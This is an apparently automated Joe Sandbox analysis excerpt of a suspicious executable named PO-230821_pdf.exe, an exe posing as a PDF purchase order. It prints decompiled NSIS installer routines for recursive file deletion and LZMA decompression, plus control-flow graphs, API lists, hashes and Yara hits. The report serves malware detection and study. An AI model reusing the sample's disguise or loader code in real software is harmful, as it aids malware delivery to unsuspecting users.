                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                            • String ID: "C:\Users\user\Desktop\PO-230821_pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO-230821_pdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                            • API String ID: 3859024572-863579335
                                            • Opcode ID: f3ac1498e1d688579d7258b622a0b5d50c25907720076392c60a7523a2d29bb1
                                            • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                            • Opcode Fuzzy Hash: f3ac1498e1d688579d7258b622a0b5d50c25907720076392c60a7523a2d29bb1
                                            • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 303 405d74-405d9a call 40603f 306 405db3-405dba 303->306 307 405d9c-405dae DeleteFileW 303->307 309 405dbc-405dbe 306->309 310 405dcd-405ddd call 406668 306->310 308 405f30-405f34 307->308 311 405dc4-405dc7 309->311 312 405ede-405ee3 309->312 316 405dec-405ded call 405f83 310->316 317 405ddf-405dea lstrcatW 310->317 311->310 311->312 312->308 315 405ee5-405ee8 312->315 318 405ef2-405efa call 40699e 315->318 319 405eea-405ef0 315->319 321 405df2-405df6 316->321 317->321 318->308 327 405efc-405f10 call 405f37 call 405d2c 318->327 319->308 324 405e02-405e08 lstrcatW 321->324 325 405df8-405e00 321->325 326 405e0d-405e29 lstrlenW FindFirstFileW 324->326 325->324 325->326 328 405ed3-405ed7 326->328 329 405e2f-405e37 326->329 343 405f12-405f15 327->343 344 405f28-405f2b call 4056ca 327->344 328->312 334 405ed9 328->334 331 405e57-405e6b call 406668 329->331 332 405e39-405e41 329->332 345 405e82-405e8d call 405d2c 331->345 346 405e6d-405e75 331->346 335 405e43-405e4b 332->335 336 405eb6-405ec6 FindNextFileW 332->336 334->312 335->331 339 405e4d-405e55 335->339 336->329 342 405ecc-405ecd FindClose 336->342 339->331 339->336 342->328 343->319 347 405f17-405f26 call 4056ca call 406428 343->347 344->308 354 405eae-405eb1 call 4056ca 345->354 355 405e8f-405e92 345->355 346->336 348 405e77-405e80 call 405d74 346->348 347->308 348->336 354->336 358 405e94-405ea4 call 4056ca call 406428 355->358 359 405ea6-405eac 355->359 358->336 359->336
                                            C-Code - Quality: 98%
                                            			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				short _v556;
                                            				short _v558;
                                            				struct _WIN32_FIND_DATAW _v604;
                                            				signed int _t38;
                                            				signed int _t52;
                                            				signed int _t55;
                                            				signed int _t62;
                                            				void* _t64;
                                            				signed char _t65;
                                            				WCHAR* _t66;
                                            				void* _t67;
                                            				WCHAR* _t68;
                                            				void* _t70;
                                            
                                            				_t65 = _a8;
                                            				_t68 = _a4;
                                            				_v8 = _t65 & 0x00000004;
                                            				_t38 = E0040603F(__eflags, _t68);
                                            				_v12 = _t38;
                                            				if((_t65 & 0x00000008) != 0) {
                                            					_t62 = DeleteFileW(_t68); // executed
                                            					asm("sbb eax, eax");
                                            					_t64 =  ~_t62 + 1;
                                            					 *0x42a2e8 =  *0x42a2e8 + _t64;
                                            					return _t64;
                                            				}
                                            				_a4 = _t65;
                                            				_t8 =  &_a4;
                                            				 *_t8 = _a4 & 0x00000001;
                                            				__eflags =  *_t8;
                                            				if( *_t8 == 0) {
                                            					L5:
                                            					E00406668(0x425750, _t68);
                                            					__eflags = _a4;
                                            					if(_a4 == 0) {
                                            						E00405F83(_t68);
                                            					} else {
                                            						lstrcatW(0x425750, L"\\*.*");
                                            					}
                                            					__eflags =  *_t68;
                                            					if( *_t68 != 0) {
                                            						L10:
                                            						lstrcatW(_t68, 0x40a014);
                                            						L11:
                                            						_t66 =  &(_t68[lstrlenW(_t68)]);
                                            						_t38 = FindFirstFileW(0x425750,  &_v604);
                                            						_t70 = _t38;
                                            						__eflags = _t70 - 0xffffffff;
                                            						if(_t70 == 0xffffffff) {
                                            							L26:
                                            							__eflags = _a4;
                                            							if(_a4 != 0) {
                                            								_t30 = _t66 - 2;
                                            								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                            								__eflags =  *_t30;
                                            							}
                                            							goto L28;
                                            						} else {
                                            							goto L12;
                                            						}
                                            						do {
                                            							L12:
                                            							__eflags = _v604.cFileName - 0x2e;
                                            							if(_v604.cFileName != 0x2e) {
                                            								L16:
                                            								E00406668(_t66,  &(_v604.cFileName));
                                            								__eflags = _v604.dwFileAttributes & 0x00000010;
                                            								if(__eflags == 0) {
                                            									_t52 = E00405D2C(__eflags, _t68, _v8);
                                            									__eflags = _t52;
                                            									if(_t52 != 0) {
                                            										E004056CA(0xfffffff2, _t68);
                                            									} else {
                                            										__eflags = _v8 - _t52;
                                            										if(_v8 == _t52) {
                                            											 *0x42a2e8 =  *0x42a2e8 + 1;
                                            										} else {
                                            											E004056CA(0xfffffff1, _t68);
                                            											E00406428(_t67, _t68, 0);
                                            										}
                                            									}
                                            								} else {
                                            									__eflags = (_a8 & 0x00000003) - 3;
                                            									if(__eflags == 0) {
                                            										E00405D74(__eflags, _t68, _a8);
                                            									}
                                            								}
                                            								goto L24;
                                            							}
                                            							__eflags = _v558;
                                            							if(_v558 == 0) {
                                            								goto L24;
                                            							}
                                            							__eflags = _v558 - 0x2e;
                                            							if(_v558 != 0x2e) {
                                            								goto L16;
                                            							}
                                            							__eflags = _v556;
                                            							if(_v556 == 0) {
                                            								goto L24;
                                            							}
                                            							goto L16;
                                            							L24:
                                            							_t55 = FindNextFileW(_t70,  &_v604);
                                            							__eflags = _t55;
                                            						} while (_t55 != 0);
                                            						_t38 = FindClose(_t70);
                                            						goto L26;
                                            					}
                                            					__eflags =  *0x425750 - 0x5c;
                                            					if( *0x425750 != 0x5c) {
                                            						goto L11;
                                            					}
                                            					goto L10;
                                            				} else {
                                            					__eflags = _t38;
                                            					if(_t38 == 0) {
                                            						L28:
                                            						__eflags = _a4;
                                            						if(_a4 == 0) {
                                            							L36:
                                            							return _t38;
                                            						}
                                            						__eflags = _v12;
                                            						if(_v12 != 0) {
                                            							_t38 = E0040699E(_t68);
                                            							__eflags = _t38;
                                            							if(_t38 == 0) {
                                            								goto L36;
                                            							}
                                            							E00405F37(_t68);
                                            							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
                                            							__eflags = _t38;
                                            							if(_t38 != 0) {
                                            								return E004056CA(0xffffffe5, _t68);
                                            							}
                                            							__eflags = _v8;
                                            							if(_v8 == 0) {
                                            								goto L30;
                                            							}
                                            							E004056CA(0xfffffff1, _t68);
                                            							return E00406428(_t67, _t68, 0);
                                            						}
                                            						L30:
                                            						 *0x42a2e8 =  *0x42a2e8 + 1;
                                            						return _t38;
                                            					}
                                            					__eflags = _t65 & 0x00000002;
                                            					if((_t65 & 0x00000002) == 0) {
                                            						goto L28;
                                            					}
                                            					goto L5;
                                            				}
                                            			}


















                                            0x00405d7e
                                            0x00405d83
                                            0x00405d8c
                                            0x00405d8f
                                            0x00405d97
                                            0x00405d9a
                                            0x00405d9d
                                            0x00405da5
                                            0x00405da7
                                            0x00405da8
                                            0x00000000
                                            0x00405da8
                                            0x00405db3
                                            0x00405db6
                                            0x00405db6
                                            0x00405db6
                                            0x00405dba
                                            0x00405dcd
                                            0x00405dd4
                                            0x00405dd9
                                            0x00405ddd
                                            0x00405ded
                                            0x00405ddf
                                            0x00405de5
                                            0x00405de5
                                            0x00405df2
                                            0x00405df6
                                            0x00405e02
                                            0x00405e08
                                            0x00405e0d
                                            0x00405e13
                                            0x00405e1e
                                            0x00405e24
                                            0x00405e26
                                            0x00405e29
                                            0x00405ed3
                                            0x00405ed3
                                            0x00405ed7
                                            0x00405ed9
                                            0x00405ed9
                                            0x00405ed9
                                            0x00405ed9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405e2f
                                            0x00405e2f
                                            0x00405e2f
                                            0x00405e37
                                            0x00405e57
                                            0x00405e5f
                                            0x00405e64
                                            0x00405e6b
                                            0x00405e86
                                            0x00405e8b
                                            0x00405e8d
                                            0x00405eb1
                                            0x00405e8f
                                            0x00405e8f
                                            0x00405e92
                                            0x00405ea6
                                            0x00405e94
                                            0x00405e97
                                            0x00405e9f
                                            0x00405e9f
                                            0x00405e92
                                            0x00405e6d
                                            0x00405e73
                                            0x00405e75
                                            0x00405e7b
                                            0x00405e7b
                                            0x00405e75
                                            0x00000000
                                            0x00405e6b
                                            0x00405e39
                                            0x00405e41
                                            0x00000000
                                            0x00000000
                                            0x00405e43
                                            0x00405e4b
                                            0x00000000
                                            0x00000000
                                            0x00405e4d
                                            0x00405e55
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405eb6
                                            0x00405ebe
                                            0x00405ec4
                                            0x00405ec4
                                            0x00405ecd
                                            0x00000000
                                            0x00405ecd
                                            0x00405df8
                                            0x00405e00
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405dbc
                                            0x00405dbc
                                            0x00405dbe
                                            0x00405ede
                                            0x00405ee0
                                            0x00405ee3
                                            0x00405f34
                                            0x00405f34
                                            0x00405f34
                                            0x00405ee5
                                            0x00405ee8
                                            0x00405ef3
                                            0x00405ef8
                                            0x00405efa
                                            0x00000000
                                            0x00000000
                                            0x00405efd
                                            0x00405f09
                                            0x00405f0e
                                            0x00405f10
                                            0x00000000
                                            0x00405f2b
                                            0x00405f12
                                            0x00405f15
                                            0x00000000
                                            0x00000000
                                            0x00405f1a
                                            0x00000000
                                            0x00405f21
                                            0x00405eea
                                            0x00405eea
                                            0x00000000
                                            0x00405eea
                                            0x00405dc4
                                            0x00405dc7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405dc7

                                            APIs
                                            • DeleteFileW.KERNEL32(?,?,75543420,75542EE0,00000000), ref: 00405D9D
                                            • lstrcatW.KERNEL32(00425750,\*.*), ref: 00405DE5
                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,75543420,75542EE0,00000000), ref: 00405E0E
                                            • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,75543420,75542EE0,00000000), ref: 00405E1E
                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                            • FindClose.KERNEL32(00000000), ref: 00405ECD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: .$.$PWB$\*.*
                                            • API String ID: 2035342205-2468439962
                                            • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                            • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                            • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                            • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 623 24508b7-24509c0 call 245005f call 2450838 call 2450073 * 8 645 24509c7-24509d7 623->645 646 24509c2 623->646 649 24509de-2450a01 CreateFileW 645->649 650 24509d9 645->650 647 2450dbc-2450dbf 646->647 651 2450a03 649->651 652 2450a08-2450a2e VirtualAlloc ReadFile 649->652 650->647 651->647 653 2450a35-2450a48 652->653 654 2450a30 652->654 656 2450da6-2450db5 call 245020a 653->656 657 2450a4e-2450da1 653->657 654->647 660 2450db7-2450db9 ExitProcess 656->660
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocNumaVirtual
                                            • String ID:
                                            • API String ID: 4233825816-0
                                            • Opcode ID: f4afd0009b576e156a24c9f8a0522b2fae668d4204696161f45768a69f5dce70
                                            • Instruction ID: 585a991a83e78f2856de8408055ef5ac415fa7ed9e9cc6372736eeea591e8e82
                                            • Opcode Fuzzy Hash: f4afd0009b576e156a24c9f8a0522b2fae668d4204696161f45768a69f5dce70
                                            • Instruction Fuzzy Hash: 2A026624D5D2ECADDF12CBE994547FDBFB05F2A201F0841CAE4E0B5283D136974A9B25
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 694 406d5f-406d64 695 406dd5-406df3 694->695 696 406d66-406d95 694->696 697 4073cb-4073e0 695->697 698 406d97-406d9a 696->698 699 406d9c-406da0 696->699 700 4073e2-4073f8 697->700 701 4073fa-407410 697->701 702 406dac-406daf 698->702 703 406da2-406da6 699->703 704 406da8 699->704 705 407413-40741a 700->705 701->705 706 406db1-406dba 702->706 707 406dcd-406dd0 702->707 703->702 704->702 709 407441-40744d 705->709 710 40741c-407420 705->710 711 406dbc 706->711 712 406dbf-406dcb 706->712 708 406fa2-406fc0 707->708 717 406fc2-406fd6 708->717 718 406fd8-406fea 708->718 722 406be3-406bec 709->722 714 407426-40743e 710->714 715 4075cf-4075d9 710->715 711->712 713 406e35-406e63 712->713 720 406e65-406e7d 713->720 721 406e7f-406e99 713->721 714->709 719 4075e5-4075f8 715->719 723 406fed-406ff7 717->723 718->723 724 4075fd-407601 719->724 725 406e9c-406ea6 720->725 721->725 726 406bf2 722->726 727 4075fa 722->727 728 406ff9 723->728 729 406f9a-406fa0 723->729 735 406eac 725->735 736 406e1d-406e23 725->736 730 406bf9-406bfd 726->730 731 406d39-406d5a 726->731 732 406c9e-406ca2 726->732 733 406d0e-406d12 726->733 727->724 737 406f75-406f79 728->737 738 40710a-407117 728->738 729->708 734 406f3e-406f48 729->734 730->719 747 406c03-406c10 730->747 731->697 739 406ca8-406cc1 732->739 740 40754e-407558 732->740 749 406d18-406d2c 733->749 750 40755d-407567 733->750 741 40758d-407597 734->741 742 406f4e-406f70 734->742 751 406e02-406e1a 735->751 752 407569-407573 735->752 743 406ed6-406edc 736->743 744 406e29-406e2f 736->744 745 407581-40758b 737->745 746 406f7f-406f97 737->746 738->722 753 406cc4-406cc8 739->753 740->719 741->719 742->738 754 406f3a 743->754 757 406ede-406efc 743->757 744->713 744->754 745->719 746->729 747->727 755 406c16-406c5c 747->755 756 406d2f-406d37 749->756 750->719 751->736 752->719 753->732 758 406cca-406cd0 753->758 754->734 759 406c84-406c86 755->759 760 406c5e-406c62 755->760 756->731 756->733 761 406f14-406f26 757->761 762 406efe-406f12 757->762 766 406cd2-406cd9 758->766 767 406cfa-406d0c 758->767 764 406c94-406c9c 759->764 765 406c88-406c92 759->765 768 406c64-406c67 GlobalFree 760->768 769 406c6d-406c7b GlobalAlloc 760->769 763 406f29-406f33 761->763 762->763 763->743 770 406f35 763->770 764->753 765->764 765->765 771 406ce4-406cf4 GlobalAlloc 766->771 772 406cdb-406cde GlobalFree 766->772 767->756 768->769 769->727 773 406c81 769->773 775 407575-40757f 770->775 776 406ebb-406ed3 770->776 771->727 771->767 772->771 773->759 775->719 776->743
                                            C-Code - Quality: 98%
                                            			E00406D5F() {
                                            				unsigned short _t531;
                                            				signed int _t532;
                                            				void _t533;
                                            				void* _t534;
                                            				signed int _t535;
                                            				signed int _t565;
                                            				signed int _t568;
                                            				signed int _t590;
                                            				signed int* _t607;
                                            				void* _t614;
                                            
                                            				L0:
                                            				while(1) {
                                            					L0:
                                            					if( *(_t614 - 0x40) != 0) {
                                            						 *(_t614 - 0x34) = 1;
                                            						 *(_t614 - 0x84) = 7;
                                            						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                            						L132:
                                            						 *(_t614 - 0x54) = _t607;
                                            						L133:
                                            						_t531 =  *_t607;
                                            						_t590 = _t531 & 0x0000ffff;
                                            						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                            						if( *(_t614 - 0xc) >= _t565) {
                                            							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                            							 *(_t614 - 0x40) = 1;
                                            							_t532 = _t531 - (_t531 >> 5);
                                            							 *_t607 = _t532;
                                            						} else {
                                            							 *(_t614 - 0x10) = _t565;
                                            							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                            							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                            						}
                                            						if( *(_t614 - 0x10) >= 0x1000000) {
                                            							L139:
                                            							_t533 =  *(_t614 - 0x84);
                                            							L140:
                                            							 *(_t614 - 0x88) = _t533;
                                            							goto L1;
                                            						} else {
                                            							L137:
                                            							if( *(_t614 - 0x6c) == 0) {
                                            								 *(_t614 - 0x88) = 5;
                                            								goto L170;
                                            							}
                                            							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                            							goto L139;
                                            						}
                                            					} else {
                                            						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                            						__esi =  *(__ebp - 0x60);
                                            						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                            						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                            						__ecx =  *(__ebp - 0x3c);
                                            						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                            						__ecx =  *(__ebp - 4);
                                            						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                            						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                            						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            						if( *(__ebp - 0x38) >= 4) {
                                            							if( *(__ebp - 0x38) >= 0xa) {
                                            								_t97 = __ebp - 0x38;
                                            								 *_t97 =  *(__ebp - 0x38) - 6;
                                            							} else {
                                            								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                            							}
                                            						} else {
                                            							 *(__ebp - 0x38) = 0;
                                            						}
                                            						if( *(__ebp - 0x34) == __edx) {
                                            							__ebx = 0;
                                            							__ebx = 1;
                                            							L60:
                                            							__eax =  *(__ebp - 0x58);
                                            							__edx = __ebx + __ebx;
                                            							__ecx =  *(__ebp - 0x10);
                                            							__esi = __edx + __eax;
                                            							__ecx =  *(__ebp - 0x10) >> 0xb;
                                            							__ax =  *__esi;
                                            							 *(__ebp - 0x54) = __esi;
                                            							__edi = __ax & 0x0000ffff;
                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            							if( *(__ebp - 0xc) >= __ecx) {
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            								__cx = __ax;
                                            								_t216 = __edx + 1; // 0x1
                                            								__ebx = _t216;
                                            								__cx = __ax >> 5;
                                            								 *__esi = __ax;
                                            							} else {
                                            								 *(__ebp - 0x10) = __ecx;
                                            								0x800 = 0x800 - __edi;
                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            								__ebx = __ebx + __ebx;
                                            								 *__esi = __cx;
                                            							}
                                            							 *(__ebp - 0x44) = __ebx;
                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                            								L59:
                                            								if(__ebx >= 0x100) {
                                            									goto L54;
                                            								}
                                            								goto L60;
                                            							} else {
                                            								L57:
                                            								if( *(__ebp - 0x6c) == 0) {
                                            									 *(__ebp - 0x88) = 0xf;
                                            									goto L170;
                                            								}
                                            								__ecx =  *(__ebp - 0x70);
                                            								__eax =  *(__ebp - 0xc);
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            								_t202 = __ebp - 0x70;
                                            								 *_t202 =  *(__ebp - 0x70) + 1;
                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            								goto L59;
                                            							}
                                            						} else {
                                            							__eax =  *(__ebp - 0x14);
                                            							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            							if(__eax >=  *(__ebp - 0x74)) {
                                            								__eax = __eax +  *(__ebp - 0x74);
                                            							}
                                            							__ecx =  *(__ebp - 8);
                                            							__ebx = 0;
                                            							__ebx = 1;
                                            							__al =  *((intOrPtr*)(__eax + __ecx));
                                            							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                            							L40:
                                            							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                            							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                            							__ecx =  *(__ebp - 0x58);
                                            							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                            							 *(__ebp - 0x48) = __eax;
                                            							__eax = __eax + 1;
                                            							__eax = __eax << 8;
                                            							__eax = __eax + __ebx;
                                            							__esi =  *(__ebp - 0x58) + __eax * 2;
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            							__ax =  *__esi;
                                            							 *(__ebp - 0x54) = __esi;
                                            							__edx = __ax & 0x0000ffff;
                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                            							if( *(__ebp - 0xc) >= __ecx) {
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            								__cx = __ax;
                                            								 *(__ebp - 0x40) = 1;
                                            								__cx = __ax >> 5;
                                            								__ebx = __ebx + __ebx + 1;
                                            								 *__esi = __ax;
                                            							} else {
                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                            								 *(__ebp - 0x10) = __ecx;
                                            								0x800 = 0x800 - __edx;
                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                            								__ebx = __ebx + __ebx;
                                            								 *__esi = __cx;
                                            							}
                                            							 *(__ebp - 0x44) = __ebx;
                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                            								L38:
                                            								__eax =  *(__ebp - 0x40);
                                            								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                            									while(1) {
                                            										if(__ebx >= 0x100) {
                                            											break;
                                            										}
                                            										__eax =  *(__ebp - 0x58);
                                            										__edx = __ebx + __ebx;
                                            										__ecx =  *(__ebp - 0x10);
                                            										__esi = __edx + __eax;
                                            										__ecx =  *(__ebp - 0x10) >> 0xb;
                                            										__ax =  *__esi;
                                            										 *(__ebp - 0x54) = __esi;
                                            										__edi = __ax & 0x0000ffff;
                                            										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            										if( *(__ebp - 0xc) >= __ecx) {
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            											__cx = __ax;
                                            											_t169 = __edx + 1; // 0x1
                                            											__ebx = _t169;
                                            											__cx = __ax >> 5;
                                            											 *__esi = __ax;
                                            										} else {
                                            											 *(__ebp - 0x10) = __ecx;
                                            											0x800 = 0x800 - __edi;
                                            											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            											__ebx = __ebx + __ebx;
                                            											 *__esi = __cx;
                                            										}
                                            										 *(__ebp - 0x44) = __ebx;
                                            										if( *(__ebp - 0x10) < 0x1000000) {
                                            											L45:
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0xe;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t155 = __ebp - 0x70;
                                            											 *_t155 =  *(__ebp - 0x70) + 1;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            										}
                                            									}
                                            									L53:
                                            									_t172 = __ebp - 0x34;
                                            									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                            									L54:
                                            									__al =  *(__ebp - 0x44);
                                            									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                            									L55:
                                            									if( *(__ebp - 0x64) == 0) {
                                            										 *(__ebp - 0x88) = 0x1a;
                                            										goto L170;
                                            									}
                                            									__ecx =  *(__ebp - 0x68);
                                            									__al =  *(__ebp - 0x5c);
                                            									__edx =  *(__ebp - 8);
                                            									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            									 *( *(__ebp - 0x68)) = __al;
                                            									__ecx =  *(__ebp - 0x14);
                                            									 *(__ecx +  *(__ebp - 8)) = __al;
                                            									__eax = __ecx + 1;
                                            									__edx = 0;
                                            									_t191 = __eax %  *(__ebp - 0x74);
                                            									__eax = __eax /  *(__ebp - 0x74);
                                            									__edx = _t191;
                                            									L79:
                                            									 *(__ebp - 0x14) = __edx;
                                            									L80:
                                            									 *(__ebp - 0x88) = 2;
                                            									goto L1;
                                            								}
                                            								if(__ebx >= 0x100) {
                                            									goto L53;
                                            								}
                                            								goto L40;
                                            							} else {
                                            								L36:
                                            								if( *(__ebp - 0x6c) == 0) {
                                            									 *(__ebp - 0x88) = 0xd;
                                            									L170:
                                            									_t568 = 0x22;
                                            									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                            									_t535 = 0;
                                            									L172:
                                            									return _t535;
                                            								}
                                            								__ecx =  *(__ebp - 0x70);
                                            								__eax =  *(__ebp - 0xc);
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
